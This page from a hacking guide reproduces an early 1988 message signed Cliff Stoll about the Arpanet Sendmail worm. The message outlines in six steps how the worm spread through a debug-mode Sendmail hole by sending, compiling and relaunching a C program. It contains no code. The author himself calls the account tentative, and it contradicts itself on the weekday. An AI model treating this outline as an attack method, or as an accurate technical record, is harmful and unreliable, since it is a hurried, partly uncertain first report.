NARC's Guide to Hacking UNIX v1.0

[<<Previous Entry] [^^Up^^] [Next Entry>>] [Menu] [About The Guide]
*****************************
THE ARPANET VIRUS SCROLLS
 The Drama Unfolds
*****************************


The following is a blow-by-blow description on what took place on Arpanet
on November 3, 1988.  The day the biggest virus scare to date took place.
These messages were captured directly from Arpanet!

***

From: Stoll@DOCKMASTER.ARPA
Subject:  Virus on the Arpanet - Milnet
Date:  Thu, 3 Nov 88 06:46 EST

Re Arpanet "Sendmail" Virus attack November 3, 1988

Hi Gang!

It's now 3:45 AM on Wednesday 3 November 1988.  I'm tired, so don't believe
everything that follows...

Apparently, there is a massive attack on Unix systems going on right now.

I have spoken to systems managers at several computers, on both the east &
west coast, and I suspect this may be a system wide problem.

Symptom: hundreds or thousands of jobs start running on a Unix system
bringing response to zero.

Systems attacked: Unix systems, 4.3BSD unix & variants (eg: SUNs) any
sendmail compiled with debug has this problem.  See below.

This virus is spreading very quickly over the Milnet.  Within the past 4
hours, I have evidence that it has hit >10 sites across the country, both
Arpanet and Milnet sites.  I suspect that well over 50 sites have been hit.
Most of these are "major" sites and gateways.

Method:

Apparently, someone has written a program that uses a hole in SMTP Sendmail
utility.  This utility can send a message into another program.

Step 1: from a distant Milnet host, a message is sent to Sendmail to fire
up SED, (SED is an editor) This is possible in certain versions of sendmail
(see below).

2:  A 99 line C program is sent to SED through Sendmail.

3:  The distant computer sends a command to compile this C program.

4:  Several object files are copied into the Unix computer.
        There are 3 files:  one targeted to Sun
                            one targeted to SUN-3
                            one targeted to vax    (ultrix probably, not vms)

5:  The C program accepts as address other Milnet sites

6:  Apparently, program scans for other Milnet/arpanet addresses and
     repeats this process.

The bug in Sendmail:

When the Unix 4.3 BSD version of Sendmail is compiled with the Debug
option, there's a hole in it.

Most Unix systems (BSD 4.3 and Suns) apparently do not have this bug.
It exists only where the system manager recompiled Sendmail and enabled
debugging.

This is bad news.

  Cliff Stoll dockmaster.arpa
.
This page created by ng2html v1.05, the Norton guide to HTML conversion utility. Written by Dave Pearson